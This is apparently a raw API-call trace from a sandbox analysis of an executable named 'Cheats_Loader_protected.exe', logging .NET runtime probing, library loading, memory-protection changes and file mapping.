SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll", len=0x34 | out: pbstr=0x13ff22c*="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll") returned 1 [0053.616] SetLastError (dwErrCode=0x2) [0053.616] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0053.616] GetLastError () returned 0x2 [0053.616] SysReAllocStringLen (in: pbstr=0x13ff22c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", len=0x3a | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll") returned 1 [0053.616] GetThreadLocale () returned 0x409 [0053.616] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0053.616] GetThreadLocale () returned 0x409 [0053.617] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0053.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", nBufferLength=0x104, lpBuffer=0x13fefb0, lpFilePart=0x13fefac | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", lpFilePart=0x13fefac*="mscorwks.dll") returned 0x39 [0053.617] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\mscorwks.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", len=0x39 | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll") returned 1 [0053.617] SysReAllocStringLen (in: pbstr=0x13ff1dc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", len=0x39 | out: pbstr=0x13ff1dc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll") returned 1 [0053.617] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", cchLength=0x39 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll") returned 0x39 [0053.617] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll", len=0x39 | out: pbstr=0x13ff22c*="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\mscorwks.dll") returned 1 [0053.617] SetLastError (dwErrCode=0x2) [0053.617] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0053.625] GetLastError () returned 0x2 [0053.625] SysReAllocStringLen (in: pbstr=0x13ff22c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", len=0x36 | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll") returned 1 [0053.625] GetThreadLocale () returned 0x409 [0053.625] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0053.625] GetThreadLocale () returned 0x409 [0053.625] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0053.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", nBufferLength=0x104, lpBuffer=0x13fefb0, lpFilePart=0x13fefac | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", lpFilePart=0x13fefac*="clr.dll") returned 0x35 [0053.625] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", len=0x35 | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll") returned 1 [0053.625] SysReAllocStringLen (in: pbstr=0x13ff1dc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", len=0x35 | out: pbstr=0x13ff1dc*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll") returned 1 [0053.625] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", cchLength=0x35 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll") returned 0x35 [0053.625] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll", len=0x35 | out: pbstr=0x13ff22c*="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\clr.dll") returned 1 [0053.625] SetLastError (dwErrCode=0x2) [0053.625] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0x26c [0053.629] GetLastError () returned 0x0 [0053.629] SysReAllocStringLen (in: pbstr=0x13ff22c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", len=0x3b | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll") returned 1 [0053.629] GetThreadLocale () returned 0x409 [0053.629] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0053.629] GetThreadLocale () returned 0x409 [0053.629] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0053.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", nBufferLength=0x104, lpBuffer=0x13fefb0, lpFilePart=0x13fefac | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", lpFilePart=0x13fefac*="mscorwks.dll") returned 0x3a [0053.629] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v2.0.50727\\mscorwks.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", len=0x3a | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll") returned 1 [0053.629] SysReAllocStringLen (in: pbstr=0x13ff1dc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", len=0x3a | out: pbstr=0x13ff1dc*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll") returned 1 [0053.629] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", cchLength=0x3a | out: lpsz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") returned 0x3a [0053.629] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", psz="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", len=0x3a | out: pbstr=0x13ff22c*="c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") returned 1 [0053.629] SetLastError (dwErrCode=0x0) [0053.629] GetCurrentThreadId () returned 0x13dc [0053.629] ResetEvent (hEvent=0x200) returned 1 [0053.630] GetCurrentThreadId () returned 0x13dc [0053.630] GetCurrentThreadId () returned 0x13dc [0053.630] GetCurrentThreadId () returned 0x13dc [0053.630] ResetEvent (hEvent=0x200) returned 1 [0053.630] GetCurrentThreadId () returned 0x13dc [0053.630] GetCurrentThreadId () returned 0x13dc [0053.630] SetEvent (hEvent=0x20c) returned 1 [0053.630] SetEvent (hEvent=0x200) returned 1 [0053.630] CloseHandle (hObject=0x26c) returned 1 [0053.631] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0x26c [0053.638] GetLastError () returned 0x0 [0053.638] SysReAllocStringLen (in: pbstr=0x13ff22c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", len=0x36 | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll") returned 1 [0053.638] GetThreadLocale () returned 0x409 [0053.638] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0053.638] GetThreadLocale () returned 0x409 [0053.638] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0053.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", nBufferLength=0x104, lpBuffer=0x13fefb0, lpFilePart=0x13fefac | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", lpFilePart=0x13fefac*="clr.dll") returned 0x35 [0053.638] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v4.0.30319\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0053.638] SysReAllocStringLen (in: pbstr=0x13ff1dc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x13ff1dc*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll") returned 1 [0053.638] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", cchLength=0x35 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 0x35 [0053.638] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll", len=0x35 | out: pbstr=0x13ff22c*="c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") returned 1 [0053.639] SetLastError (dwErrCode=0x0) [0053.639] GetCurrentThreadId () returned 0x13dc [0053.639] ResetEvent (hEvent=0x200) returned 1 [0053.639] GetCurrentThreadId () returned 0x13dc [0053.639] GetCurrentThreadId () returned 0x13dc [0053.639] GetCurrentThreadId () returned 0x13dc [0053.639] GetCurrentThreadId () returned 0x13dc [0053.639] ResetEvent (hEvent=0x200) returned 1 [0053.639] GetCurrentThreadId () returned 0x13dc [0053.639] GetCurrentThreadId () returned 0x13dc [0053.639] SetEvent (hEvent=0x20c) returned 1 [0053.639] SetEvent (hEvent=0x200) returned 1 [0053.639] CloseHandle (hObject=0x26c) returned 1 [0053.641] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xe7c11c, cbMultiByte=11, lpWideCharStr=0x13fe1d4, cchWideChar=2047 | out: lpWideCharStr="SHLWAPI.dll盬Ŀ䀅耀\x05⛴盭㔀\x07ᅠ盬") returned 11 [0053.641] SysReAllocStringLen (in: pbstr=0x13ff1d8*=0x0, psz="SHLWAPI.dll", len=0xb | out: pbstr=0x13ff1d8*="SHLWAPI.dll") returned 1 [0053.641] CharLowerBuffW (in: lpsz="SHLWAPI.dll", cchLength=0xb | out: lpsz="shlwapi.dll") returned 0xb [0053.641] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x76ba0000 [0053.641] GetLastError () returned 0x0 [0053.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0053.641] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0053.641] GetModuleFileNameA (in: hModule=0x76ba0000, lpFilename=0x13ff0c0, nSize=0x105 | out: lpFilename="C:\\WINDOWS\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0053.642] GetCurrentProcess () returned 0xffffffff [0053.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff1c4*=0x76bdc298, NumberOfBytesToProtect=0x13ff1c8, NewAccessProtection=0x4, OldAccessProtection=0x13ff1fc | out: BaseAddress=0x13ff1c4*=0x76bdc000, NumberOfBytesToProtect=0x13ff1c8, OldAccessProtection=0x13ff1fc*=0x2) returned 0x0 [0053.642] GetCurrentProcess () returned 0xffffffff [0053.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff1c4*=0x76bdc298, NumberOfBytesToProtect=0x13ff1c8, NewAccessProtection=0x2, OldAccessProtection=0x13ff1fc | out: BaseAddress=0x13ff1c4*=0x76bdc000, NumberOfBytesToProtect=0x13ff1c8, OldAccessProtection=0x13ff1fc*=0x4) returned 0x0 [0053.642] GetCurrentProcess () returned 0xffffffff [0053.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff1c4*=0x76bdc2ac, NumberOfBytesToProtect=0x13ff1c8, NewAccessProtection=0x4, OldAccessProtection=0x13ff1fc | out: BaseAddress=0x13ff1c4*=0x76bdc000, NumberOfBytesToProtect=0x13ff1c8, OldAccessProtection=0x13ff1fc*=0x2) returned 0x0 [0053.642] GetCurrentProcess () returned 0xffffffff [0053.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff1c4*=0x76bdc2ac, NumberOfBytesToProtect=0x13ff1c8, NewAccessProtection=0x2, OldAccessProtection=0x13ff1fc | out: BaseAddress=0x13ff1c4*=0x76bdc000, NumberOfBytesToProtect=0x13ff1c8, OldAccessProtection=0x13ff1fc*=0x4) returned 0x0 [0053.643] SetLastError (dwErrCode=0x0) [0053.643] GetProcAddress (hModule=0x76ba0000, lpProcName="UrlIsW") returned 0x76bb34c0 [0053.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0053.643] GetLastError () returned 0x2 [0053.643] SysReAllocStringLen (in: pbstr=0x13ff240*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", len=0x3a | out: pbstr=0x13ff240*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config") returned 1 [0053.643] GetThreadLocale () returned 0x409 [0053.643] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0053.643] GetThreadLocale () returned 0x409 [0053.643] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0053.644] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", nBufferLength=0x104, lpBuffer=0x13fefc4, lpFilePart=0x13fefc0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", lpFilePart=0x13fefc0*="Cheats_Loader_protected.exe.config") returned 0x3a [0053.644] SysReAllocStringLen (in: pbstr=0x13ff240*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", len=0x3a | out: pbstr=0x13ff240*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config") returned 1 [0053.644] SysReAllocStringLen (in: pbstr=0x13ff1f0*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", len=0x3a | out: pbstr=0x13ff1f0*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config") returned 1 [0053.644] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", cchLength=0x3a | out: lpsz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config") returned 0x3a [0053.644] SysReAllocStringLen (in: pbstr=0x13ff240*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe.config", psz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config", len=0x3a | out: pbstr=0x13ff240*="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe.config") returned 1 [0053.644] SetLastError (dwErrCode=0x2) [0053.645] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x26c [0053.646] GetLastError () returned 0x0 [0053.646] SysReAllocStringLen (in: pbstr=0x13ff248*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ff248*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0053.646] GetThreadLocale () returned 0x409 [0053.646] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0053.646] GetThreadLocale () returned 0x409 [0053.646] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0053.646] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x104, lpBuffer=0x13fefcc, lpFilePart=0x13fefc8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x13fefc8*="Cheats_Loader_protected.exe") returned 0x33 [0053.646] SysReAllocStringLen (in: pbstr=0x13ff248*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ff248*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0053.646] SysReAllocStringLen (in: pbstr=0x13ff1f8*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ff1f8*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0053.646] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchLength=0x33 | out: lpsz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 0x33 [0053.646] SysReAllocStringLen (in: pbstr=0x13ff248*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", psz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", len=0x33 | out: pbstr=0x13ff248*="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 1 [0053.646] GetCurrentThreadId () returned 0x13dc [0053.646] ResetEvent (hEvent=0x200) returned 1 [0053.646] GetCurrentThreadId () returned 0x13dc [0053.646] GetCurrentThreadId () returned 0x13dc [0053.646] GetCurrentThreadId () returned 0x13dc [0053.646] GetCurrentThreadId () returned 0x13dc [0053.646] ResetEvent (hEvent=0x200) returned 1 [0053.646] GetCurrentThreadId () returned 0x13dc [0053.646] GetCurrentThreadId () returned 0x13dc [0053.646] SetEvent (hEvent=0x20c) returned 1 [0053.646] SetEvent (hEvent=0x200) returned 1 [0053.647] SetLastError (dwErrCode=0x0) [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] SetEvent (hEvent=0x20c) returned 1 [0053.647] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] ResetEvent (hEvent=0x200) returned 1 [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] ResetEvent (hEvent=0x200) returned 1 [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] SetEvent (hEvent=0x20c) returned 1 [0053.647] SetEvent (hEvent=0x200) returned 1 [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] GetCurrentThreadId () returned 0x13dc [0053.647] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0053.648] GetCurrentThreadId () returned 0x13dc [0053.648] GetCurrentThreadId () returned 0x13dc [0053.648] GetCurrentThreadId () returned 0x13dc [0053.648] SetEvent (hEvent=0x20c) returned 1 [0053.660] GetCurrentThreadId () returned 0x13dc [0053.660] ResetEvent (hEvent=0x200) returned 1 [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] ResetEvent (hEvent=0x200) returned 1 [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] SetEvent (hEvent=0x20c) returned 1 [0053.661] SetEvent (hEvent=0x200) returned 1 [0053.661] CloseHandle (hObject=0x26c) returned 1 [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] ResetEvent (hEvent=0x200) returned 1 [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] ResetEvent (hEvent=0x200) returned 1 [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] GetCurrentThreadId () returned 0x13dc [0053.661] SetEvent (hEvent=0x20c) returned 1 [0053.661] SetEvent (hEvent=0x200) returned 1 [0053.661] CloseHandle (hObject=0x270) returned 1 [0053.662] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x270 [0053.662] GetLastError () returned 0x0 [0053.662] SysReAllocStringLen (in: pbstr=0x13ff248*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ff248*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0053.662] GetThreadLocale () returned 0x409 [0053.662] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0053.662] GetThreadLocale () returned 0x409 [0053.662] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0053.662] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", nBufferLength=0x104, lpBuffer=0x13fefcc, lpFilePart=0x13fefc8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", lpFilePart=0x13fefc8*="Cheats_Loader_protected.exe") returned 0x33 [0053.662] SysReAllocStringLen (in: pbstr=0x13ff248*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ff248*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0053.662] SysReAllocStringLen (in: pbstr=0x13ff1f8*=0x0, psz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", len=0x33 | out: pbstr=0x13ff1f8*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe") returned 1 [0053.662] CharLowerBuffW (in: lpsz="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", cchLength=0x33 | out: lpsz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 0x33 [0053.662] SysReAllocStringLen (in: pbstr=0x13ff248*="C:\\Users\\FD1HVy\\Desktop\\Cheats_Loader_protected.exe", psz="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe", len=0x33 | out: pbstr=0x13ff248*="c:\\users\\fd1hvy\\desktop\\cheats_loader_protected.exe") returned 1 [0053.662] GetCurrentThreadId () returned 0x13dc [0053.662] ResetEvent (hEvent=0x200) returned 1 [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] ResetEvent (hEvent=0x200) returned 1 [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] SetEvent (hEvent=0x20c) returned 1 [0053.663] SetEvent (hEvent=0x200) returned 1 [0053.663] SetLastError (dwErrCode=0x0) [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] GetCurrentThreadId () returned 0x13dc [0053.663] SetEvent (hEvent=0x20c) returned 1 [0053.663] 